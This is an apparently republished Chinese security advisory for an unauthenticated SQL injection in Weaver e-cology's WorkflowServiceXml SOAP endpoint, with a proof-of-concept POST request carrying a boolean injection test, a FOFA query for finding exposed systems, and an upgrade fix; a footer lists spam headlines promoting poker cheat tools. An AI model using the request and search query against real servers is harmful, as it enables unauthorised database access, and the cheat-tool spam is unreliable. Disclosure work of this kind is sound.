泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)
创始人
2025-01-08 04:32:28
0

漏洞描述:
泛微 e-cology 是泛微公司开发的协同管理应用平台。泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。

漏洞发现时间:

2024-7-12


影响版本:
e-cology9 < 10.64.1

FOFA语法:

app="泛微-OA(e-cology)"

POC:

POST /services/WorkflowServiceXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: text/xml Accept-Encoding: gzip Content-Length: 487                      1         1         1         1                      1=1 AND 5615=5615                    

漏洞复现:


修复:

目前官方已有可更新版本,建议受影响用户升级至最新版本:

https://www.weaver.com.cn/cs/securityDownload.html

参考文献:

OSCS | 开源软件供应链安全社区 | 让每一个开源项目变得更安全

POC/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md at main · wy876/POC · GitHub

相关内容

热门资讯

透视透视!如何下载wepoke... 透视透视!如何下载wepoker安装包,wejoker辅助软件视频,本来是有辅助方法(哔哩哔哩)亲,...
透视app"wepo... 透视app"wepoker透视有没有"wepoker安装教程(都是是真的辅助辅助器)-哔哩哔哩进入游...
日前!欢乐情怀挂,wepoke... 日前!欢乐情怀挂,wepoker透视苹果系统(透视)其实有辅助工具(哔哩哔哩)暗藏猫腻,小编详细说明...
据了解!闲逸透视软件是免费的吗... 据了解!闲逸透视软件是免费的吗,微信微乐辅助ios(总是是有安装)-哔哩哔哩1、闲逸透视软件是免费的...
透视私人局"wpk俱... 透视私人局"wpk俱乐部辅助器"wepoker辅助工具(本来是真的辅助软件)-哔哩哔哩1、wpk俱乐...
详情透视!wpk辅助,wpk俱... 详情透视!wpk辅助,wpk俱乐部是做什么的,本来存在有辅助app(哔哩哔哩)一、游戏安装教程牌型概...
据相关数据显示!雀姬手机辅助脚... 据相关数据显示!雀姬手机辅助脚本,德普之星辅助器(透视)切实真的是有辅助方法(哔哩哔哩)1、让任何用...
据通报!微信老友广东辅助,凑一... 据通报!微信老友广东辅助,凑一桌游戏软件下载(真是是有插件)-哔哩哔哩1、操作简单,无需凑一桌游戏软...
透视工具"werpl... 透视工具"werplan免费挂下载"pokerrrr2辅助(本来真的有辅助安装)-哔哩哔哩1、上手简...
必备透视!hhpoker辅助挂... 必备透视!hhpoker辅助挂是真的吗,hhpoker是正规的吗,本来有辅助app(哔哩哔哩)1、下...